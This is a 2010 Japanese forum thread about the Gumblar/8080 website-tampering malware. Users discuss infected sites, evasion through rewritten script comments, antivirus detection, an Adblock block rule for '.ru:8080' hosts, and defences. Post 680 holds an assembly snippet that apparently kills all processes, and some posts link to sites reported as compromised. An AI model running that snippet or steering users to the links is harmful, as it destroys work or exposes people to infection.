529名無しさん@お腹いっぱい。:2010/01/08(金) 00:02:42
>>523
アバストタンにも怒られた
530名無しさん@お腹いっぱい。:2010/01/08(金) 00:09:37
お前らよく平気で踏めるな。
531名無しさん@お腹いっぱい。:2010/01/08(金) 00:11:38
だいたい仮想環境で踏んでるんだろ
アホもいるだろうけど
532名無しさん@お腹いっぱい。:2010/01/08(金) 00:12:40
自信があるならドンドン踏むことをオススメする、それが漢だ

自己責任だけどね
533名無しさん@お腹いっぱい。:2010/01/08(金) 00:13:08
一応view-source:使ったけどそれでも怒られた
オンラインソースチェッカーがなくなったのが辛い
534名無しさん@お腹いっぱい。:2010/01/08(金) 00:21:05
>>530

バーチャルなら余裕だべ
535名無しさん@お腹いっぱい。:2010/01/08(金) 00:29:20
そろそろニュースでも扱われるようになってきたし
これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか
536名無しさん@お腹いっぱい。:2010/01/08(金) 00:37:40
しかし.ruばっかだな
537名無しさん@お腹いっぱい。:2010/01/08(金) 00:38:46
別に感染してもたいしたことないしな
それほど怖くもないだろ
538名無しさん@お腹いっぱい。:2010/01/08(金) 00:39:27
cnとruを遮断すればかなり安全になるしな
539名無しさん@お腹いっぱい。:2010/01/08(金) 00:41:33
ならないだろうな、無関心な奴は大して気にしなさそうだしニュースで扱われても
一部の人間が騒ぐことになるだけ

mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう
540名無しさん@お腹いっぱい。:2010/01/08(金) 00:46:31
サイバーエージェントとノートンの「ノートン警察」閲覧者にトロイの木馬感染のおそれ
http://tsushima.2ch.net/test/read.cgi/news/1262865452/  
541名無しさん@お腹いっぱい。:2010/01/08(金) 01:08:28
>>523
/*LGPL*/
ちょっと変わってるぞ

>>529
あれ? こっちでは反応ない
542名無しさん@お腹いっぱい。:2010/01/08(金) 01:12:26
543541:2010/01/08(金) 01:22:17
もう一ヶ所/*LGPL*/になっている所をみつけた
新型スクリプトみたいだな
検出できるのはノートンの侵入検知くらいかも
avast!にはスクリプトの検体を提出しておこう
544名無しさん@お腹いっぱい。:2010/01/08(金) 01:29:57
>>541
えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが
545名無しさん@お腹いっぱい。:2010/01/08(金) 01:38:45
>>544
標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか?
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた
546名無しさん@お腹いっぱい。:2010/01/08(金) 01:58:14
貼られた直後に飛び先のチェックでソース見たときは/*GNU GPL*/だったような・・・
まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも
547名無しさん@お腹いっぱい。:2010/01/08(金) 02:43:36
Amebaのブログパーツ「ノートン警察」閲覧者にトロイの木馬感染のおそれ
http://www.itmedia.co.jp/news/articles/1001/07/news092.html

12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。

 ノートン警察は、シマンテックと共同で昨年9月17日〜12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。
548名無しさん@お腹いっぱい。:2010/01/08(金) 02:47:15 BE:1887326-2BP(1236)
>>523
whois見てそこへ報告すた。
届けばいいけど。。。
549名無しさん@お腹いっぱい。:2010/01/08(金) 02:54:13
Adblockのブロックリストに
|http://*.ru:8080/*
で今のところは大丈夫かな
550名無しさん@お腹いっぱい。:2010/01/08(金) 02:56:26
>>526
aguseで調べたけど出なかったKasperskyなのに
画像取得日時 2010-01-08 02:53:28
検出されたウイルス(ワーム、スパイウエア)
ウイルス(ワーム、スパイウエア)は検出されませんでした。
551名無しさん@お腹いっぱい。:2010/01/08(金) 02:59:42
ドクター中松のサイトもやられてる
552名無しさん@お腹いっぱい。:2010/01/08(金) 03:01:59 BE:2829492-2BP(1236)
>>551
/*GNU GPL*/ だぎゃ。。。
553名無しさん@お腹いっぱい。:2010/01/08(金) 03:02:03
>>551
GNU GPLだね
554名無しさん@お腹いっぱい。:2010/01/08(金) 03:08:37
しかし凄いことになってるな
555名無しさん@お腹いっぱい。:2010/01/08(金) 03:09:16 BE:11319089-2BP(1236)
556名無しさん@お腹いっぱい。:2010/01/08(金) 03:33:03
インターネットからftpでメンテできるwebサイトが多すぎなのが悪いんだろ?
うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、
HP制作会社にはVPNクライアントいれてもらってる
仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可
557名無しさん@お腹いっぱい。:2010/01/08(金) 03:34:32
avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/
558名無しさん@お腹いっぱい。:2010/01/08(金) 03:38:13
今まで/*GNU GPL*/だったサイトも/*LGPL*/に変わったりするのかな?

Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感
559名無しさん@お腹いっぱい。:2010/01/08(金) 04:00:05
RequestPolicyでブロックしたがthelaceweb●ruだな。
560名無しさん@お腹いっぱい。:2010/01/08(金) 04:14:39
>>523
スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね
561名無しさん@お腹いっぱい。:2010/01/08(金) 04:21:50 BE:1572252-2BP(1236)
>>541,543
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…
562名無しさん@お腹いっぱい。:2010/01/08(金) 04:22:12
ドクター中松のサイトが/*LGPL*/になった・・・
563名無しさん@お腹いっぱい。:2010/01/08(金) 04:25:23 BE:943632-2BP(1236)
>>562
あちゃー
564名無しさん@お腹いっぱい。:2010/01/08(金) 04:30:52 BE:2830436-2BP(1236)
しかも呼び込み先変えてるっぽい…
565名無しさん@お腹いっぱい。:2010/01/08(金) 04:32:34
yahooやらgooやらがやられない事を祈るだけだな・・・
566名無しさん@お腹いっぱい。:2010/01/08(金) 05:00:21
>>562
もともと/*LGPL*/じゃなかったの?
俺は初めに見た時から/*LGPL*/だったよ?
カスペは全く反応しなかったよ
新種なの?
567名無しさん@お腹いっぱい。:2010/01/08(金) 05:05:39 BE:5660249-2BP(1236)
568名無しさん@お腹いっぱい。:2010/01/08(金) 05:06:43
569名無しさん@お腹いっぱい。:2010/01/08(金) 05:08:03
>>566
>>551-553
自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな
570名無しさん@お腹いっぱい。:2010/01/08(金) 05:10:54 BE:2830829-2BP(1236)
571名無しさん@お腹いっぱい。:2010/01/08(金) 05:12:44
検出逃れのために数時間の間に書き換えが行われているってこと?
572名無しさん@お腹いっぱい。:2010/01/08(金) 05:13:32
>>571
えぐざくとりぃ
多分…
573名無しさん@お腹いっぱい。:2010/01/08(金) 05:14:10
春先のGENO騒動(同人祭り)に比べてスレ伸びが鈍いのが気になる…大手企業も続々やられてるというのに。
adobe系更新でokだからか?
一般ユーザには実害が無いからか?
春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか?
この手の騒動に飽きたのか?
574名無しさん@お腹いっぱい。:2010/01/08(金) 05:14:15
それじゃソフト入れて対策コピペの奴全部実行して対処しても意味ねーじゃん('A`)
575名無しさん@お腹いっぱい。:2010/01/08(金) 05:17:09 BE:1572252-2BP(1236)
>>573
> 同人祭り
学習したんじゃないかな。。。

>>574
頻繁に更新があるウイルスもあったのでにゃー
576名無しさん@お腹いっぱい。:2010/01/08(金) 05:18:01
>>573
GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い
577名無しさん@お腹いっぱい。:2010/01/08(金) 05:22:20 BE:3773838-2BP(1236)
>>576
にゃるほど。
初期のものはそーだったのか。
578名無しさん@お腹いっぱい。:2010/01/08(金) 05:22:53
>>573
・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574
発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし
579名無しさん@お腹いっぱい。:2010/01/08(金) 05:27:00
>>576
Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね?
ちなみに初代Gumblarも復活の兆しありとか
580名無しさん@お腹いっぱい。:2010/01/08(金) 05:27:27
>>573
前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね
581名無しさん@お腹いっぱい。:2010/01/08(金) 05:30:36
>>579
そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ
582名無しさん@お腹いっぱい。:2010/01/08(金) 05:30:40
>>578
水面下で拡大して後々めんどくさい事になるのが怖いんだが…。
583名無しさん@お腹いっぱい。:2010/01/08(金) 05:33:32
結局、8080系に引っかかった奴らって>>580が答えなの?
あんだけ騒がれてたのにアップデートもしてなかったの?
584名無しさん@お腹いっぱい。:2010/01/08(金) 05:34:11
同人系でも古参が多かったり旬で活発なジャンルは今でもGENOの注意書き残してるとこ多いからなぁ
若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが
585名無しさん@お腹いっぱい。:2010/01/08(金) 05:34:12
コメント行が書き換えられただけで検出できないって・・
どこのセキュソフトも本格的な対策は取ってないってこと?
586名無しさん@お腹いっぱい。:2010/01/08(金) 05:40:13
>>581
まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな?w
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585
何を以て本格的な対策と言うのか?そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ!とか絶対に思わないこと
587名無しさん@お腹いっぱい。:2010/01/08(金) 05:44:30
>>585
いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず
588名無しさん@お腹いっぱい。:2010/01/08(金) 05:52:18
今のところついてってるのはNOD32だけだね
ユーザーの対策が出来ていても、htmlに埋め込まれたドロッパーは取り込んでしまうからね。
それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。
JAVAもフラッシュも使えないネットなんて
経済的損失が計り知れなくなるだろう。
589名無しさん@お腹いっぱい。:2010/01/08(金) 05:55:53
業者起きたのか。釣り針でけえな
590名無しさん@お腹いっぱい。:2010/01/08(金) 05:57:19
NOD32(笑)
591名無しさん@お腹いっぱい。:2010/01/08(金) 05:58:04
JAVAとJAVAScriptの区別は必要だな
592名無しさん@お腹いっぱい。:2010/01/08(金) 05:58:51
おおっNOD32一番乗りか?と思いきや別のサイトのスクリプトでは・・・
偶然引っかかっただけだな

結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262897785
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262897301
結果: 0/41
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262897643

85 名前: 滑車(東日本)[sage] 投稿日:2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
>>1のソースをvirustotalにおくったらNOD32だけが反応した
http://tsushima.2ch.net/test/read.cgi/news/1262886266/85-87
593名無しさん@お腹いっぱい。:2010/01/08(金) 05:59:26
594名無しさん@お腹いっぱい。:2010/01/08(金) 06:01:47
>>593 それ書いたのは僕なんですがAvast!信者です。
595名無しさん@お腹いっぱい。:2010/01/08(金) 06:01:49
さて、変わったのはコメント行だけかな?
どうやって指令してるのかな?
596名無しさん@お腹いっぱい。:2010/01/08(金) 06:04:58
犬HKラジオでもトップニュース扱いだな。
597名無しさん@お腹いっぱい。:2010/01/08(金) 06:05:22
受付のスクリプトに反応するかしないかの問題であって、他のベンダーが絶対検知できないって訳じゃないでしょ
要はどの段階で検知するかの問題
後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん

でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど?
製品比較やりたいなら、適当な別スレでどうぞ
598592:2010/01/08(金) 06:12:34
自分はあくまで検証目的で貼っただけなんだが・・・
気を悪くしたなら少し控えるか
定義データに左右されないらしいノートンの侵入検知の例もあるしな
599名無しさん@お腹いっぱい。:2010/01/08(金) 06:16:18
>>598
いやいや、検証目的としてはぜんぜんおkだし>>592のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいw
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってサーセン
600名無しさん@お腹いっぱい。:2010/01/08(金) 06:19:34
>>599
おk
ではこれからも節度を持った上で貼らせてもらおう
601名無しさん@お腹いっぱい。:2010/01/08(金) 07:21:17
なんだかすげえ馬鹿スレになってきたな
602名無しさん@お腹いっぱい。:2010/01/08(金) 07:43:56
>>522
ノートンは確信犯だってば
芸能アバターのせい
603名無しさん@お腹いっぱい。:2010/01/08(金) 08:03:40
良い悪いすんなっても気になるのが人情だろ。
人間見ないでルールだけ見る奴って何なの?
604名無しさん@お腹いっぱい。:2010/01/08(金) 08:09:03
avast以外大丈夫だよ
605名無しさん@お腹いっぱい。:2010/01/08(金) 08:53:47
そもそも、インターネットからFTPで更新できるってのがもういまの時代はダメダメだろ
特定のIPアドレスに制限するとか、VPN必須にするとかしないと
606名無しさん@お腹いっぱい。:2010/01/08(金) 09:25:29
>>604
なにが?avast!以外大丈夫なのかな?
607名無しさん@お腹いっぱい。:2010/01/08(金) 09:37:40
これ明らかに世界中のインターネット絶滅推進派が仕組んだテロだろ
608名無しさん@お腹いっぱい。:2010/01/08(金) 09:47:27
609名無しさん@お腹いっぱい。:2010/01/08(金) 09:48:34
こういうネズミ算式に増えていく無差別で大規模な改竄は今まで何度かあったけど、
今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。
610名無しさん@お腹いっぱい。:2010/01/08(金) 10:27:03
>>609
年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな
611sage ◆sage/xLnlI :2010/01/08(金) 10:28:46
>>608
('A`)
612名無しさん@お腹いっぱい。:2010/01/08(金) 11:13:29
結局どうすりゃいいのよ、誰もわかんないのかよ
613名無しさん@お腹いっぱい。:2010/01/08(金) 11:16:20
lanケーブルをハサミでチョキンとやれば確実に防げるぞ
614名無しさん@お腹いっぱい。:2010/01/08(金) 11:18:47
FTPの情報どうやって抜いてんの?
FFFTPのレジストリに生で記録されてんのか?
iniに出力するようにしてるんだが、どうだろうか
615名無しさん@お腹いっぱい。:2010/01/08(金) 11:29:36
会社で借りてるサーバにうちの馬鹿が感染させたんだが、
上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる

書き換えられるたびにコード削除していくの疲れたよ
616名無しさん@お腹いっぱい。:2010/01/08(金) 11:30:16
FTP通信したときのパケットそのものを見てると思う
FTPソフト側での回避は無理
617名無しさん@お腹いっぱい。:2010/01/08(金) 11:33:20
>>615

感染したのは8080?
書き換えられる頻度はどのくらい?
618名無しさん@お腹いっぱい。:2010/01/08(金) 11:38:49
>>615
それはありえんw
619名無しさん@お腹いっぱい。:2010/01/08(金) 11:50:47
>>615

アホだなー
620名無しさん@お腹いっぱい。:2010/01/08(金) 11:55:01
>>615
なんで変えられないんだろう?
感染をもみ消したいのかな?

更に大きな感染呼び込んで信用失うだけだと思うが。
621sage ◆sage/xLnlI :2010/01/08(金) 12:09:16
http://www.zenoah.coアッー!jp/

実験台で見たらコードがなかった・・・
622名無しさん@お腹いっぱい。:2010/01/08(金) 12:09:31
>>617
まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ

今は/*LGPL*/から始まって8!@0@^8)@0?/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな

一部/*GNU GPL*/〜のまま放っておいたものが/*LGPL*/〜に置き換わってた
追記じゃないみたいだね

>>620
全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな
623名無しさん@お腹いっぱい。:2010/01/08(金) 12:11:02
>>622
なんなのその原始時代みたいな会社w
624名無しさん@お腹いっぱい。:2010/01/08(金) 12:11:25 BE:235456823-2BP(7777)
他人の不幸で飯が旨い
625名無しさん@お腹いっぱい。:2010/01/08(金) 12:15:13
どうせ感染したというアナウンスもしてないんだろ

てういか今後も感染するから出せないかw
626名無しさん@お腹いっぱい。:2010/01/08(金) 12:15:39
>>623
実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る
627名無しさん@お腹いっぱい。:2010/01/08(金) 12:18:01
>>626
そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。

いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわw
628名無しさん@お腹いっぱい。:2010/01/08(金) 12:19:59
>>626
会社としてやばい
すぐに転職を勧める
629sage ◆sage/xLnlI :2010/01/08(金) 12:28:39
http://up3.viploader.net/ippan/src/vlippan054095.png

一部の記号を消したらこうなった
630名無しさん@お腹いっぱい。:2010/01/08(金) 12:33:03
誰か検体上げてくれ
631名無しさん@お腹いっぱい。:2010/01/08(金) 12:33:58
なんでサーバーの管理者がWindowsなんか使ってるんだ?
普通は違うOSを使うと思うんだけどな
632名無しさん@お腹いっぱい。:2010/01/08(金) 12:34:52
>>631
Webデザイナのマシンに感染したとか
633名無しさん@お腹いっぱい。:2010/01/08(金) 12:40:04
ずっと鯖OSさわってるのは鯖屋であって
鯖管とは違くないか

Telnetあるし
634sage ◆sage/xLnlI :2010/01/08(金) 12:41:51
635名無しさん@お腹いっぱい。:2010/01/08(金) 12:42:21
ソースチェッカーオンラインみたいなサイトないの?
怖くて未知のURLは踏めん・・・
636名無しさん@お腹いっぱい。:2010/01/08(金) 12:43:32
Telnetってww
いつの時代だよwww
637sage ◆sage/xLnlI :2010/01/08(金) 12:43:45
仮想でAVAST止めて行ったら仮想じゃない方攻撃されてノートン先生に止められたwwwwwww
638名無しさん@お腹いっぱい。:2010/01/08(金) 12:44:46
顧客情報にアクセスできるショッピングサイトの管理者はすぐに対応しろ
639名無しさん@お腹いっぱい。:2010/01/08(金) 12:45:22
640名無しさん@お腹いっぱい。:2010/01/08(金) 12:48:33
>>637
そのゲストOS・・・プロダクトキー入れてる?
盗まれるぞ・・・
641名無しさん@お腹いっぱい。:2010/01/08(金) 12:54:44
>>281
それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど
642名無しさん@お腹いっぱい。:2010/01/08(金) 13:00:04
>>641
WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々
643名無しさん@お腹いっぱい。:2010/01/08(金) 13:12:35
>>642
MSDNに該当する記事有り
Windows Firewall and Windows Firewall with Advanced Security (Windows)
ttp://msdn.microsoft.com/en-us/library/aa366453(VS.85).aspx
644sage ◆sage/xLnlI :2010/01/08(金) 13:31:12
>>640
このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・
645名無しさん@お腹いっぱい。:2010/01/08(金) 13:33:10
>>642
なにそれ
だめじゃん
646名無しさん@お腹いっぱい。:2010/01/08(金) 13:34:22
そもそも、Windowsを管理者権限で常に使用してるようなやつが
Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ

通常使用は一般ユーザーで使用すればいいのに
7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて
すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい
647名無しさん@お腹いっぱい。:2010/01/08(金) 13:36:03
>>644
マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい
648名無しさん@お腹いっぱい。:2010/01/08(金) 13:36:15
一般ユーザーですら管理者権限
流石Microsoft
649sage ◆sage/xLnlI :2010/01/08(金) 13:37:32
>>647
大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからb
650sage ◆sage/xLnlI :2010/01/08(金) 13:38:12
>>648
なアッー!っなアッー!んだアッー!ってええええええええええええええええええええええええええええええええええええええええ
651sage ◆sage/xLnlI :2010/01/08(金) 13:40:03
>>647
アッー!と、一回M$のXPModeで、ひどい目にアッー!っアッー!から使いたくない
652名無しさん@お腹いっぱい。:2010/01/08(金) 13:41:18
◆sage/xLnlI、アウト〜
653名無しさん@お腹いっぱい。:2010/01/08(金) 13:41:18
>>646
明示的に表示されてないとfirewallスルーできないよね
できないといって><
654sage ◆sage/xLnlI :2010/01/08(金) 13:42:12
>>652
なアッー!んで?
655名無しさん@お腹いっぱい。:2010/01/08(金) 13:42:51
結論「ユーザーの意識改革が必要」
656名無しさん@お腹いっぱい。:2010/01/08(金) 13:43:52
少々知識が足りなかったようだな
657sage ◆sage/xLnlI :2010/01/08(金) 13:44:29
Firefoxがクラッシュしまアッー!した
658名無しさん@お腹いっぱい。:2010/01/08(金) 13:44:59
NGNameに追加 sage </b>◆sage/xLnlI <b>
659名無しさん@お腹いっぱい。:2010/01/08(金) 13:45:51
話は全部聞かせて貰ったぞ!(ガラッ
sage ◆sage/xLnlIのプロダクトキーは既に流出している
660sage ◆sage/xLnlI :2010/01/08(金) 13:46:35
>>659
えっ


どうゆうこと?


661名無しさん@お腹いっぱい。:2010/01/08(金) 13:59:27
既に感染しているかどうかを調べる方法がないことだけは分かった
662sage ◆sage/xLnlI :2010/01/08(金) 14:00:29
>>661
うn


windows7の感染確認方法知ってす人いないよね?・?
663名無しさん@お腹いっぱい。:2010/01/08(金) 14:02:03
>>646

そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...

664名無しさん@お腹いっぱい。:2010/01/08(金) 14:04:28
ずっとこんなイタチゴッコ続けるのかよ。
感染したらUbuntuにする。少なくとも嫁のPCは。
665名無しさん@お腹いっぱい。:2010/01/08(金) 14:04:34
もそもそ
666名無しさん@お腹いっぱい。:2010/01/08(金) 14:05:52
>>664
上流のdebianにしろksg
667名無しさん@お腹いっぱい。:2010/01/08(金) 14:06:08
むしろ感染してしまえば楽になるような気がする
俺は遠慮するけど
668名無しさん@お腹いっぱい。:2010/01/08(金) 14:10:35
とりあえず現状、普通のクライアントPCが感染してるかどうかの判断ってどうやってんの?
春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが
669名無しさん@お腹いっぱい。:2010/01/08(金) 14:12:00
ウイルスの検体マダー!?
670名無しさん@お腹いっぱい。:2010/01/08(金) 14:12:47
>>663
自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう
671sage ◆sage/xLnlI :2010/01/08(金) 14:12:54
672名無しさん@お腹いっぱい。:2010/01/08(金) 14:14:31
プロダクトキーを入力せずにインスコ→被害者向けの特価で正規のプロダクトキー購入→ウマー
これがMicrosoftクオリティーなのか・・・
673名無しさん@お腹いっぱい。:2010/01/08(金) 14:26:03
>>668
ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない
674名無しさん@お腹いっぱい。:2010/01/08(金) 14:28:05
>>673
嘘の情報ってww
検体があればリバースエンジニアリングで動作くらい分かるだろJK
675名無しさん@お腹いっぱい。:2010/01/08(金) 14:32:49
>>663
つ 別のユーザとして実行

これで動かないソフトのほとんどは動く。
676名無しさん@お腹いっぱい。:2010/01/08(金) 14:32:53
あっちこっちで呼び方が違うからもう何がなんだか分からない
677名無しさん@お腹いっぱい。:2010/01/08(金) 14:33:42
>>664
誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ

NetBSDとかOpenBSDとか
678名無しさん@お腹いっぱい。:2010/01/08(金) 14:33:58
普通のクライアントPCは感染してるかどうか確認する方法ないの?
マジで?

全台クリーンインストールしろと言うのか
679名無しさん@お腹いっぱい。:2010/01/08(金) 14:36:02
>>678
新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる
680名無しさん@お腹いっぱい。:2010/01/08(金) 14:37:00
section .note.netbsd.ident
dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000


section .data

section .text
global _start

_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80
681名無しさん@お腹いっぱい。:2010/01/08(金) 14:38:21
>>648
マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。
682名無しさん@お腹いっぱい。:2010/01/08(金) 14:39:01
AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
683名無しさん@お腹いっぱい。:2010/01/08(金) 14:39:28
>>681
誰でも簡単に権限昇格できるWindowsなんて(ry
684名無しさん@お腹いっぱい。:2010/01/08(金) 14:43:17
>>675

大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ〜

Vistaが出てやっと対応したところのが多いじゃん
685名無しさん@お腹いっぱい。:2010/01/08(金) 14:46:15
【ネット】洋菓子「モロゾフ」のサイト、何者かが改ざん 閲覧すると新型ウイルス「ガンブラー」に感染する恐れがあったが、被害報告なし
1 :おっおにぎりがほしいんだなφ ★:2010/01/06(水) 07:20:34 ID:???0
洋菓子メーカー「モロゾフ」(本社・神戸市)のインターネットサイトが
何者かに改ざんされる被害に遭っていたことが5日、わかった。

同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス
「ガンブラー」に感染する恐れがあったが、被害の報告はなく、
サイトは改善済みという。

同社の説明では、改ざんされたのは4日午後7時半〜5日正午で、
感染や情報漏えいなどの連絡はない、としている。




こういう「被害の報告は無く」ってのが一番怖いと思うんだが…
閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ?
686名無しさん@お腹いっぱい。:2010/01/08(金) 14:48:00
>>682
だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる
687名無しさん@お腹いっぱい。:2010/01/08(金) 14:50:26
【今株馬鹿】GENOウイルスのお陰でウイルス対策会社の株が急騰
http://tsushima.2ch.net/test/read.cgi/news/1262929220/
688名無しさん@お腹いっぱい。:2010/01/08(金) 14:51:25
保護モードなんてバイパス出来るだろww
689名無しさん@お腹いっぱい。:2010/01/08(金) 14:53:07
>>686
IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの?
Adobeの脆弱性を突いた攻撃と何の関係があるの?
690名無しさん@お腹いっぱい。:2010/01/08(金) 14:54:51
感染しているかどうかを調べる
今一番有力な方法を教えてくださひ。
691名無しさん@お腹いっぱい。:2010/01/08(金) 14:56:19
>>685
お前らモロゾフのHP見てみろw
http://mimizun.com/log/2ch/news4vip/1262612925/

1 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:48:45.86 ID:kMgcW7bI0
ttp://www.morozoff.co.jp/

なんだこれw


5 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:53:02.74 ID:+8J8P32m0
Javaのコンソールが起動してPCがすげー重くなった
なんか仕込まれてるの?


7 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 23:00:03.62 ID:euSlf2pA0
>>1
死ね

重いいいいいいいいいい
692名無しさん@お腹いっぱい。:2010/01/08(金) 14:56:45
webサイト作ったらわかるんじゃね?
改ざんされたら感染してる
693名無しさん@お腹いっぱい。:2010/01/08(金) 14:59:14
VPCでモロゾフを踏んでみた。
processmoniterでその時の挙動を調べてみたが、何も起こらない・・・
694名無しさん@お腹いっぱい。:2010/01/08(金) 15:01:03
保護モードって、IEのプロセスを通常よりさらに限定された権限で
動作させることに一番の意味があるんだよ

保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない

保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない

このあたり呼んでみれば?
http://msdn.microsoft.com/ja-jp/library/bb250462(VS.85).aspx
695名無しさん@お腹いっぱい。:2010/01/08(金) 15:03:37
>>692
適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか?
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。
696名無しさん@お腹いっぱい。:2010/01/08(金) 15:03:51
保護モードバイパス美味しいです^^
CodeProject: A Developer's Survival Guide to IE Protected Mode. Free source code and programming help
ttp://www.codeproject.com/KB/vista-security/PMSurvivalGuide.aspx
